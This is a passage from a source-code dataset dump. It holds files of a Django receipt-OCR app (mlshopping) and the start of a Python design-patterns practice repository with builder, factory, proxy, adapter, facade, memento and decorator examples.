tekst2=tekst2[1:]\n\n while tekst2[-1] == '\\n' or len(tekst2[-1])==1:\n del tekst2[-1]\n\n tekst3=[]\n\n i=0\n while True: #to sie przydaje jak ta sama linjka jest rozrzucona na dwa wiersze\n try :\n if tekst2[i+1] == '\\n':\n tekst3.append(tekst2[i]+' ' +tekst2[i+2])\n i+=3\n else:\n tekst3.append(tekst2[i])\n i+=1\n except IndexError:\n try: \n tekst3.append(tekst2[i])\n break\n except:\n break\n #tu moze byc kiedys problem jak nie bedzie co zastapic\n tekst4=[]\n for i in tekst3:\n tekst4.append(i.replace('\\n',''))\n\n #funkcja sprawdzajaca czy w slowie jest wiecej liter czy liczb\n def letters_check(word):\n letters = 0\n numbers = 0\n for i in word:\n try :\n int(i)\n numbers +=1\n except ValueError:\n letters +=1\n\n if letters >numbers:\n return 'letter'\n else:\n return 'number'\n\n\n cena = []\n \n #to zadziala jak zalozymy ze nie ma juz wolnych linii\n for i, item in enumerate(tekst4):\n for j, item1 in enumerate(item.split(' ')[::-1]):\n if len(item1) == 1:\n continue\n else:\n cena.append(item1)\n break\n\n\n #to ma na celu pozbycie sie liter z listy z cenami\n #to wynika z tego ze tesseract jest zle wytrenowany pozniej do usniecia\n '''\n new_cena_1=[]\n def bez_liter(lista):\n for i, item in enumerate(lista):\n if 'T' in item:\n new_item = item.replace('T', '1')\n new_cena_1.append(new_item)\n\n elif 'U' in item:\n new_item = item.replace('U', '0')\n new_cena_1.append(new_item)\n else:\n new_cena_1.append(item)\n bez_liter(cena)\n\n #kod testowy for paragon z biedronka\n #p=new_cena_1.pop(2)\n #p1=p+'D'\n #new_cena_1.insert(2, p1)\n\n\n # to teraz sie tyczy paragonow ze sklepow typy biedronka, ktore maja\n # na koncu litere razem z suma\n\n new_cena_2=[]\n def bez_liter_beidra(lista):\n for i, item in enumerate(lista):\n if letters_check(item[-1]) == 'letter':\n new_item = item[:-1]\n new_cena_2.append(new_item)\n else:\n new_cena_2.append(item)\n\n 
bez_liter_beidra(new_cena_1)\n\n def to_decimal_number(lista):\n new_cena_3=[]\n for i, item in enumerate(lista):\n if ',' in item:\n new_item = item.replace(',', '.')\n new_cena_3.append(new_item)\n else:\n new_cena_3.append(item)\n\n return new_cena_3\n\n new_cena_3 = to_decimal_number(new_cena_2)\n\n def to_floating_point(lista):\n new_cena_4=[]\n for i, item in enumerate(lista):\n try:\n a=float(item)\n new_cena_4.append(a)\n except ValueError:\n new_cena_4.append(None)\n\n return new_cena_4\n\n new_cena_4 = to_floating_point(new_cena_3)\n '''\n\n #teraz zajmiemy sie itemami z przodu\n\n #ta funkcja ma na celu pozbycie sie spacji na pierwszym mijescu w elementach paragonu\n #co mialo mijesce w jednym z paragonow\n def infront_spaces(lista):\n tekst5=[]\n for i, item in enumerate(lista):\n if item[0] ==' ':\n while item[0] ==' ':\n item = item[1:]\n tekst5.append(item)\n else:\n tekst5.append(item)\n return tekst5\n\n #tekst5 =infront_spaces(tekst4)\n tekst5=tekst4[:]\n nazwa_produktu = []\n for i, item in enumerate(tekst5):\n nazwa=''\n for j, item1 in enumerate(item.split(' ')): #to wezmie tylko po uwage 4 pierwsze elemtny\n if j==0:\n nazwa=nazwa+item1+' '\n else: # j >0:\n if letters_check(item1) == 'letter' and len(item1)>1:\n nazwa=nazwa+item1+' '\n elif letters_check(item1) == 'letter' and len(item1) == 1 and item1 =='Z':\n nazwa=nazwa+item1+' '\n else:\n break\n\n nazwa_produktu.append(nazwa)\n\n return zip(nazwa_produktu,cena)\n \nif __name__ =='__main__':\n import sys\n img = sys.argv[1]\n tekst_from_img =pytesseract.image_to_string(Image.open(img), lang='pol')\n rt=to_text(tekst_from_img)\n print(list(rt))\n"
},
{
"alpha_fraction": 0.739130437374115,
"alphanum_fraction": 0.739130437374115,
"avg_line_length": 27.75,
"blob_id": "90ed097bf14caa81dbaf8dc568d67259d32ec128",
"content_id": "1515061d753b4a564f74104d26378384f35439a9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 345,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 12,
"path": "/receipt/urls.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url,include\nfrom django.contrib import admin\nfrom receipt import views\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n url(r'^receipt-list/$', views.lista_paragonow, name='lista_paragonow'),\n url(r'^receipt-form/$', views.add_receipt, name='add_receipt'),\n ]\n"
},
{
"alpha_fraction": 0.6496496200561523,
"alphanum_fraction": 0.6536536812782288,
"avg_line_length": 28.294116973876953,
"blob_id": "8d0cadd1cb21c62626303dfae09e9b6b1ef893b9",
"content_id": "d7cd5b7791d962d3e352f9299dff580ee01c8453",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 999,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 34,
"path": "/receipt/views.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render, redirect\nfrom .forms import ParagonForm\nfrom .models import Paragon\nimport pytesseract\n\nfrom .tasks import items_from_image\n\nfrom PIL import Image, ImageFilter\n\ndef start_page(request):\n return render(request,'base.html')\n\n\ndef lista_paragonow(request):\n qs = Paragon.objects.filter(user1=request.user)[::-1] \n context={'qs':qs}\n return render(request, 'receipt/paragon_list2.html', context)\n\n\ndef add_receipt(request):\n if request.method == 'POST':\n form =ParagonForm(request.POST, request.FILES)\n print(request.FILES['image'])\n if form.is_valid():\n new_rec =form.save(commit=False)\n new_rec.user1=request.user \n new_rec.save()\n items_from_image.delay(new_rec.image.name)\n return redirect('paragony:lista_paragonow')\n else:\n form =ParagonForm()\n \n context = {'form':form}\n return render (request, 'receipt/paragon_form.html', context)\n\n\n\n"
},
{
"alpha_fraction": 0.657819926738739,
"alphanum_fraction": 0.6606634855270386,
"avg_line_length": 30.969696044921875,
"blob_id": "d216b3ff1372032642db4331edd2001b166016b1",
"content_id": "8e1247b1c0cce97d13f3df6615ad26d2668f36b3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2110,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 66,
"path": "/log_user/views.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect,get_object_or_404\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login,logout\nfrom django.views.generic import View\nfrom .forms import UserForm\nfrom django.core.urlresolvers import reverse\n\n\n\ndef logout1(request):\n user = request.user.username\n logout(request)\n context = {'user':user}\n return render (request, 'log_user/logout.html', context)\n\ndef register_sussess(request):\n return render (request, 'log_user/successful_registration.html')\n\ndef login1(request):\n form = UserForm ()\n context = {'form':form}\n \n if request.method == 'POST':\n form = UserForm(request.POST)\n\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate (username=username, password=password)\n if user is not None:\n login(request, user)\n # return redirect('paragony:lista_paragonow')\n return redirect('home')\n else:\n context['flag'] = True\n \n return render(request, 'log_user/login.html', context)\n\n\ndef register1(request):\n form = UserForm ()\n context = {'form': form}\n \n if request.method == 'POST':\n form = UserForm (request.POST)\n\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate (username=username, password=password)\n if form.is_valid():\n user=form.save(commit=False)\n user.set_password(password)\n user.save()\n return HttpResponseRedirect('/regsuccess/')\n else:\n context['flag'] = True\n return render(request, 'log_user/register.html', context)\n\n@login_required\ndef user_loged(request):\n user=request.user.username\n quaryset = Pytania.objects.filter(user=user).values('carddeck').distinct()\n context = {'pytania':quaryset,}\n return render (request, 'user_loged.html', context)\n"
},
{
"alpha_fraction": 0.7050754427909851,
"alphanum_fraction": 0.714677631855011,
"avg_line_length": 35.400001525878906,
"blob_id": "95cb003f5959d358d95d2299145dc392b4195fe0",
"content_id": "a40a7026789dec414063fc5967a4a5d2a0989238",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 729,
"license_type": "permissive",
"max_line_length": 186,
"num_lines": 20,
"path": "/receipt/models.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass Paragon(models.Model):\n image = models.FileField()\n image_data = models.TextField(null=True, blank=True, default='Processing image... Refresh to check for results. If that doesnt help please wait or do something else one the website')\n user1 = models.ForeignKey(User, blank=True, null=True)\n\ndef __str__(self):\n return str(self.image)\n\n\nclass ParagonItems(models.Model):\n id_paragonu =models.ForeignKey(Paragon, blank=True, null=True) \n cena = models.CharField(max_length=120, null=True, blank=True)\n produkt = models.CharField(max_length=120, null=True, blank=True)\n\n def __str__(self):\n return (self.produkt)\n\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 18.75,
"blob_id": "d365f9e56ff026942882a08d669dd394db3e6d17",
"content_id": "eef2221b02c86351e31a4831e3c384055342cbdd",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 159,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 8,
"path": "/receipt/forms.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom .models import Paragon\n\n\nclass ParagonForm(forms.ModelForm):\n class Meta:\n model = Paragon\n fields =('image',)\n\n"
},
{
"alpha_fraction": 0.4889867901802063,
"alphanum_fraction": 0.691629946231842,
"avg_line_length": 16.461538314819336,
"blob_id": "4dbb2afa4e8959f6c06c97a901e0cbe60e35bf9a",
"content_id": "4acd41a1ea59ee23515d042d7ac8dad4222e4f13",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 227,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 13,
"path": "/requirements.txt",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "amqp==2.1.4\nbilliard==3.5.0.2\ncelery==4.0.2\nDjango==1.10.5\ndjango-celery-beat==1.0.1\ndjango-celery-results==1.0.1\nkombu==4.0.2\nPillow==3.4.2\npytesseract==0.1.6\npython-Levenshtein==0.12.0\npytz==2016.10\nredis==2.10.5\nvine==1.1.3\n"
},
{
"alpha_fraction": 0.7027971744537354,
"alphanum_fraction": 0.7080419659614563,
"avg_line_length": 30.61111068725586,
"blob_id": "bb17fda0a82a0e6a4a884dcf40d07543036c60f0",
"content_id": "e3b2f6fb7255feeee73002cb7a5a65aa9468092d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 572,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 18,
"path": "/receipt/tasks.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "#from __future__ import absolute_import, unicode_literals\nfrom celery.decorators import task\n\nfrom .models import Paragon, ParagonItems\nimport pytesseract\nfrom PIL import Image, ImageFilter\nfrom .image_utils import to_text\n\n@task(name='tessaract_in_action')\ndef items_from_image(image):\n hj=Paragon.objects.get(image=image)\n dane = pytesseract.image_to_string(Image.open(hj.image.path), lang='pol')\n dane2 = to_text(dane)\n for i,j in dane2:\n p=ParagonItems(id_paragonu=hj, cena =j, produkt=i)\n p.save()\n hj.image_data = dane2\n hj.save()\n\n\n\n"
}
] | 11 |
sanket7783/BigDataPractice
|
https://github.com/sanket7783/BigDataPractice
|
08a86147c78c7c98ce8ed7156d01f596cf7db033
|
4023d3327f3d1fbdffbe24476423b82d5254b7ef
|
38fabf018cd2530f3409cf86ddae7c3e3e92f8fe
|
refs/heads/master
| 2020-11-28T11:46:57.527347 | 2019-12-28T19:55:58 | 2019-12-28T19:55:58 | 229,803,637 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.614386796951294,
"alphanum_fraction": 0.6214622855186462,
"avg_line_length": 24.606060028076172,
"blob_id": "21ffca817ab4f99632f71268fe9fb5a9831aefb7",
"content_id": "db1cc77709e7c22bb0ff647a69c82705ab678712",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 848,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 33,
"path": "/avro/avro-data-gen.py",
"repo_name": "sanket7783/BigDataPractice",
"src_encoding": "UTF-8",
"text": "from fastavro import reader, writer, parse_schema\nimport json\n\ninpFile = str(input(\"Enter the avro data file name: \"))\ninpSchemaFile = str(input(\"Enter the avro schema file name: \"))\noutFile = str(input(\"Enter the avro output file: \")) or \"outdata.avro\"\n\n\nwith open(inpSchemaFile,'rb') as sc:\n schema = sc.read()\n\nparsed = parse_schema(json.loads(schema))\n\n\nwith open(inpFile,'rb') as inp:\n records = [r for r in reader(inp)]\n records.append(records[-1])\n flag=1\n while flag:\n field = str(input(\"Which field you want to edit: \"))\n if '.' in field:\n pass\n else:\n records[-1][field] = int(input(\"Enter the value for \"+ field+\": \"))\n flag = int(input(\"Press 1 to continue or 0 to halt: \"))\n print(records[-1])\n\n\n\n\n\nwith open(outFile, 'wb') as out:\n writer(out, parsed, records)\n\n\n\n"
},
{
"alpha_fraction": 0.8372092843055725,
"alphanum_fraction": 0.8372092843055725,
"avg_line_length": 42,
"blob_id": "a5ced4766e6b91fa8aac107f37d62c91882ac4d9",
"content_id": "8e5a6e006244bbe511838a183ea233852cc6c73e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 86,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 2,
"path": "/README.md",
"repo_name": "sanket7783/BigDataPractice",
"src_encoding": "UTF-8",
"text": "# BigDataPractice\nContains the snippets that I have created while practicing Big data\n"
}
] | 2 |
chaithra-s/321810304038-Assignment-4
|
https://github.com/chaithra-s/321810304038-Assignment-4
|
605ecb5486d0dc725ef39f822ac394d5adb19bfb
|
16d0a6f283bafe4013ed6425c551bfd3ba05b14c
|
26639efe1fb46008760a3db3732110f6b52f2790
|
refs/heads/master
| 2022-11-07T22:53:27.080587 | 2020-06-23T01:57:34 | 2020-06-23T01:57:34 | 274,284,382 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6034836173057556,
"alphanum_fraction": 0.6229507923126221,
"avg_line_length": 19.14583396911621,
"blob_id": "b3c6763ebebef031484bf7a10890a2fa77ed9f91",
"content_id": "ce447dfdcd40120dae49a0c0618febe85c39f056",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 976,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 48,
"path": "/newfile.py",
"repo_name": "chaithra-s/321810304038-Assignment-4",
"src_encoding": "UTF-8",
"text": "#maximum of 3 numbers\ndef max(x,y,z):\n\tif x>y and x>z:\n\t\tprint(\"maximum is :\",x)\n\telif y>x and y>z:\n\t\tprint(\"maximum is :\",y)\n\telse:\n\t\tprint(\"maximum is :\",z)\nmax(2,7,6)\n\n#to reverse a string\nx=str(input(\"Enter a string:\"))\nprint(\"Reverse of the string is:\")\nprint(x[::-1])\n\n# prime or not\nnum=int(input(\"enter a number:\"))\nfor i in range(2,num):\n\tif num %i ==0:\n\t\tprint(num,\"is not a prime number\")\n\t\tbreak\n\telse:\n\t\tprint(num,\"is a prime number\")\n\t\t\n#palindrome or not\ntry:\n\tnum=int(input(\"Enter a number:\"))\n\texcept Exception as ValueError:\n\t\tprint('Invalid input enter a integer')\t\n\t\telse:\n\t\t\ttemp=num\n\t\t\trev=0\n\t\t\twhile(num>0):\n\t\t\t\tdig=num%10\n\t\t\t\trev=rev*10+dig\n\t\t\t\tnum=num//10\n\t\t\t\tif(temp==rev):\n\t\t\t\t\tprint(' The number is palindrome')\n\t\t\telse:\t\n\t\t\tprint('Not a palindrome')\n\t\t\tfinally:\n\t\t\t\tprint('program executed')\n\t\t\t\t\n#sum of squares of n natural numbers\ndef squaresum(n):\n\t\t\t\treturn(n*(n+1)*(2*n+1))//6\nn= int(input('Enter the number:'))\nprint(squaresum(n))\n\t\t\t\t\n\t\t\t\t"
}
] | 1 |
gamolyavlad/python_paterns
|
https://github.com/gamolyavlad/python_paterns
|
97f51fc2bcee11ff28e05547b97a24c060530d8c
|
8a5c5482e836856fe214b8b13995dbbd03e6c9e6
|
d5aa7c86c61af7490068685619c02dc403f1d62e
|
refs/heads/master
| 2020-04-03T09:53:33.998403 | 2016-10-10T22:14:12 | 2016-10-10T22:14:12 | 65,307,456 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6851471662521362,
"alphanum_fraction": 0.6940451860427856,
"avg_line_length": 30.085105895996094,
"blob_id": "30359111c2a15b295182c5b61229b9c7334e34f0",
"content_id": "1dd9a0765b831015352348ac77bb9c19b1ca02f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1461,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 47,
"path": "/creational/builder.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\" Python supports named parameters, so builder doesn`t make any sence . \"\"\"\n\nfrom collections import namedtuple\n\nIMMUTABLE_OBJECT_FIELDS = ['required_function_result', 'required_parameter', 'default_parameter']\n\n\nclass ImmutableObjectBuilder(object):\n def __init__(self, required_function, required_parameter, default_parameter=\"foo\"):\n self.required_function = required_function\n self.required_parameter = required_parameter\n self.default_parameter = default_parameter\n\n def build(self):\n return ImmutableObject(self.required_function(self.required_parameter),\n self.required_parameter,\n self.default_parameter)\n\n\nclass ImmutableObject(namedtuple('ImmutableObject', IMMUTABLE_OBJECT_FIELDS)):\n __slots__ = ()\n\n @property\n def foo_property(self):\n return self.required_function_result + self.required_parameter\n\n def foo_function(self):\n return self.required_function_result - self.required_parameter\n\n def __str__(self):\n return str(self.__dict__)\n\n\nmy_builder = ImmutableObjectBuilder(lambda x: x + 1, 2)\nobj1 = my_builder.build()\nmy_builder.default_parameter = \"bar\"\nmy_builder.required_parameter = 1\nobj2 = my_builder.build()\nmy_builder.required_function = lambda x: x - 1\nobj3 = my_builder.build()\n\nprint(obj1)\nprint(obj1.required_function_result)\nprint(obj1.foo_property)\nprint(obj1.foo_function())\nprint(obj2)\nprint(obj3)\n"
},
{
"alpha_fraction": 0.6522411108016968,
"alphanum_fraction": 0.6630603075027466,
"avg_line_length": 28.409090042114258,
"blob_id": "02046c02e80af62199d914767427f8150ddc9228",
"content_id": "b51b88b872ff78648e937c7b7d7413f796314b20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1294,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 44,
"path": "/structural/proxy.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nA proxy is a wrapper or agent object that is being called by the client to access\nthe real serving object behind the scenes.\nFor the client, usage of a proxy object is similar to using the real object, because both implement the same interface.\n\"\"\"\n\n\nclass Image(object):\n def __init__(self, filename):\n self._filename = filename\n self._loaded = False\n\n def load(self):\n print(\"loading {}\".format(self._filename))\n self._loaded = True\n\n def display(self):\n if not self._loaded:\n self.load()\n print(\"displaying {}\".format(self._filename))\n\n\nclass Proxy:\n def __init__(self, subject):\n self._subject = subject\n self._proxystate = None\n\n\nclass ProxyImage(Proxy):\n def display_image(self):\n if self._proxystate == None:\n self._subject.load()\n self._proxystate = 1\n print(\"display \" + self._subject._filename)\n\n\nproxy_image1 = ProxyImage(Image(\"HiRes_10Mb_Photo1\"))\nproxy_image2 = ProxyImage(Image(\"HiRes_10Mb_Photo2\"))\n\nproxy_image1.display_image() # loading necessary\nproxy_image1.display_image() # loading unnecessary\nproxy_image2.display_image() # loading necessary\nproxy_image2.display_image() # loading unnecessary\nproxy_image1.display_image() # loading unnecessary\n"
},
{
"alpha_fraction": 0.6662613749504089,
"alphanum_fraction": 0.6711246371269226,
"avg_line_length": 29.462963104248047,
"blob_id": "8c32522c6de68d48d33f33f07968ef6bd294d1f6",
"content_id": "adb54bdca16ed04f845a76a09d97065654929159",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1645,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 54,
"path": "/creational/abstract_factory.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nThe abstract factory pattern provides a way to encapsulate a group of individual factories that have a common theme\nwithout specifying their concrete classes.[1] In normal usage, the client software creates a concrete implementation of\nthe abstract factory and then uses the generic interface of the factory to create the concrete objects that are part of\nthe theme\n\"\"\"\n\n\nclass Product(object):\n def __init__(self, name='iPhone', price=600.0, expiration_date=None, out_of_stock=False):\n self.name = name\n self.price = price\n self.expiration_date = expiration_date\n self.out_of_stock = out_of_stock\n\n def is_product_availiable(self):\n pass\n\n\nclass Shop(object):\n def get_availiable_product(self, name):\n pass\n\n\nclass Order(object):\n def __init__(self, ProductClass, ShopClass):\n self.product = ProductClass()\n self.shop = ShopClass()\n\n def get_order(self):\n return self.shop.get_availiable_product(self.product)\n\n\nclass Phone(Product):\n def is_product_availiable(self):\n if not self.out_of_stock:\n return True\n return False\n\n\nclass InternetShop(Shop):\n def __init__(self, *args, **kwargs):\n self.availiable_product = []\n iphone = Product('iPhone', 900)\n self.availiable_product.append(iphone.name)\n\n def get_availiable_product(self, product):\n if product.name in self.availiable_product and product.is_product_availiable():\n return product\n raise Exception('Product doesn`t availiable ')\n\nif __name__ == '__main__':\n order = Order(Phone, InternetShop)\n print(order.get_order())\n"
},
{
"alpha_fraction": 0.6213235259056091,
"alphanum_fraction": 0.6341911554336548,
"avg_line_length": 18.087718963623047,
"blob_id": "85678c9e59f12f7127ce21e86fa458b50cd8950a",
"content_id": "394ebeae3582fa0dc9de085824416b3d12ad7bca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1088,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 57,
"path": "/structural/adapter.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nConvert the interface of a class into another interface clients expect. Adapter lets classes work together that couldn't\notherwise because of incompatible interfaces.\n\"\"\"\n\n\nclass Png(object):\n def draw_png_image(self):\n return \"Draw png image\"\n\n\nclass Jpg(object):\n def draw_jpg_image(self):\n return \"Draw jpg image\"\n\n\nclass Photo(Png):\n def draw_image(self):\n return self.draw_png_image()\n\n\nclass Gradient(Jpg):\n def draw_image(self):\n return self.draw_jpg_image()\n\n\nclass Gallery:\n def __init__(self, source):\n self.source = source\n\n def show_picture(self):\n return self.source.draw_image()\n\n\np = Photo()\ng = Gradient()\nphoto_images = Gallery(p)\ngradient_background = Gallery(g)\nprint(photo_images.show_picture())\nprint(gradient_background.show_picture())\n\n\n# class Target:\n# @staticmethod\n# def meth1(p1, p2):\n#\n# print(p1 + \", \" + p2)\n#\n#\n# class Adapter:\n# @staticmethod\n# def meth2(p1, p2, p3):\n#\n# Target.meth1(p1, p2 + \" and \" + p3)\n#\n#\n# Adapter.meth2('here', 'there', 'everywhere')\n"
},
{
"alpha_fraction": 0.64665287733078,
"alphanum_fraction": 0.6659765243530273,
"avg_line_length": 26.339622497558594,
"blob_id": "908931c4d1c32a6dc883543c800dcf1b19178ee6",
"content_id": "0e625abb4400073f53e509b585c7c87b805ac25c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1459,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 53,
"path": "/structural/facade.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSubsystem1 general principle that I apply when I’m casting about trying to mold requirements into Subsystem1 first-cut object is\n“If something is ugly, hide it inside an object.” This is basically what Facade accomplishes. If you have Subsystem1 rather\nconfusing collection of classes and interactions that the client programmer doesn’t really need to see, then you can\ncreate an interface that is useful for the client programmer and that only presents what’s necessary.e.\n\"\"\"\n\n\nclass Subsystem1:\n def __init__(self, x):\n self.x = x\n print('init Subsystem1')\n\n\nclass Subsystem2:\n def __init__(self, x):\n self.x = x\n print('init Subsystem2')\n\n\nclass Subsystem3:\n def __init__(self, x):\n self.x = x\n print('init Subsystem3')\n\nclass Facade:\n @staticmethod\n def make_subsystem_1(x):\n print('make Subsystem1')\n return Subsystem1(x)\n\n @staticmethod\n def make_subsystem_2(x):\n print('make Subsystem2')\n return Subsystem2(x)\n\n @staticmethod\n def make_subsystem_3(x):\n print('make Subsystem3')\n return Subsystem3(x)\n\n\nclass Client:\n def __init__(self):\n self.facade = Facade()\n\n\n# gets the objects by calling the static methods\nif __name__ == '__main__':\n client = Client()\n Subsystem1 = client.facade.make_subsystem_1(1)\n Subsystem2 = client.facade.make_subsystem_2(1)\n Subsystem3 = client.facade.make_subsystem_3(1.0)\n"
},
{
"alpha_fraction": 0.5066320896148682,
"alphanum_fraction": 0.516435980796814,
"avg_line_length": 23.77142906188965,
"blob_id": "1b9765f310573f1c57129e35565b8994f6cc3974",
"content_id": "3b2e7062b81d7c07253c40f07e987dd8ce338969",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3468,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 140,
"path": "/behavioral/memento.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nThe memento pattern is a software design pattern that provides the ability to restore an object to its previous state\n(undo via rollback)\n\"\"\"\n\n\nclass MementoMetaclass(type):\n cache = {}\n\n def __call__(self, *args):\n print(\"=\" * 20)\n print(\"ClassObj:\", self)\n print(\"Args:\", args)\n print(\"=\" * 20)\n cached = self.cache.get(args, None)\n if not cached:\n instance = type.__call__(self, *args)\n self.cache.update({args: instance})\n return instance\n return cached\n\n\nclass Foo(object):\n __metaclass__ = MementoMetaclass\n template = ''\n\n def __init__(self, arg1, arg2, arg3):\n self.template = arg1\n\n\nif __name__ == '__main__':\n a = Foo(1, 2, 3)\n b = Foo(2, 3, 4)\n c = Foo(1, 2, 3)\n d = Foo(2, 3, 4)\n e = Foo(5, 6, 7)\n f = Foo(5, 6, 7)\n\n print(id(a), id(b), id(c), id(d), id(e), id(f))\n# from copy import copy, deepcopy\n#\n#\n# def memento(obj, deep=False):\n# state = deepcopy(obj.__dict__) if deep else copy(obj.__dict__)\n#\n# def restore():\n# obj.__dict__.clear()\n# obj.__dict__.update(state)\n#\n# return restore\n#\n#\n# class Transaction:\n# \"\"\"A transaction guard.\n# This is, in fact, just syntactic sugar around a memento closure.\n# \"\"\"\n# deep = False\n# states = []\n#\n# def __init__(self, deep, *targets):\n# self.deep = deep\n# self.targets = targets\n# self.commit()\n#\n# def commit(self):\n# self.states = [memento(target, self.deep) for target in self.targets]\n#\n# def rollback(self):\n# for a_state in self.states:\n# a_state()\n#\n#\n# class Transactional(object):\n# \"\"\"Adds transactional semantics to methods. Methods decorated with\n# @Transactional will rollback to entry-state upon exceptions.\n# \"\"\"\n#\n# def __init__(self, method):\n# self.method = method\n#\n# def __get__(self, obj, T):\n# def transaction(*args, **kwargs):\n# state = memento(obj)\n# try:\n# return self.method(obj, *args, **kwargs)\n# except Exception as e:\n# state()\n# raise e\n#\n# return transaction\n#\n#\n# class NumObj(object):\n# def __init__(self, value):\n# self.value = value\n#\n# def __repr__(self):\n# return '<%s: %r>' % (self.__class__.__name__, self.value)\n#\n# def increment(self):\n# self.value += 1\n#\n# @Transactional\n# def do_stuff(self):\n# self.value = '1111' # <- invalid value\n# self.increment() # <- will fail and rollback\n#\n#\n# if __name__ == '__main__':\n# num_obj = NumObj(-1)\n# print(num_obj)\n#\n# a_transaction = Transaction(True, num_obj)\n# try:\n# for i in range(3):\n# num_obj.increment()\n# print(num_obj)\n# a_transaction.commit()\n# print('-- committed')\n#\n# for i in range(3):\n# num_obj.increment()\n# print(num_obj)\n# num_obj.value += 'x' # will fail\n# print(num_obj)\n# except Exception as e:\n# a_transaction.rollback()\n# print('-- rolled back')\n# print(num_obj)\n#\n# print('-- now doing stuff ...')\n# try:\n# num_obj.do_stuff()\n# except Exception as e:\n# print('-> doing stuff failed!')\n# import sys\n# import traceback\n#\n# traceback.print_exc(file=sys.stdout)\n# print(num_obj)\n"
},
{
"alpha_fraction": 0.6603773832321167,
"alphanum_fraction": 0.6603773832321167,
"avg_line_length": 15.736842155456543,
"blob_id": "9437d3ac2db6908fb305871c395042b3bb318ae2",
"content_id": "e8bda572ced9934dd36ca63b1c908efa0f86e710",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 318,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 19,
"path": "/structural/decorator.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAlready implemented in python\n\"\"\"\n\n\ndef main_function(text):\n return \"Passed into main function : {}\".format(text)\n\n\ndef decorate(func):\n def func_wrapper(name):\n return \"Before : {}\".format(func(name))\n\n return func_wrapper\n\n\nmy_get_text = decorate(main_function)\n\nprint(my_get_text(\"Main text\"))\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6040816307067871,
"avg_line_length": 18.090909957885742,
"blob_id": "a256804e008576910091064dcef08e283b437a05",
"content_id": "2de881725619daf11c821f58428357749aabd8d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1470,
"license_type": "no_license",
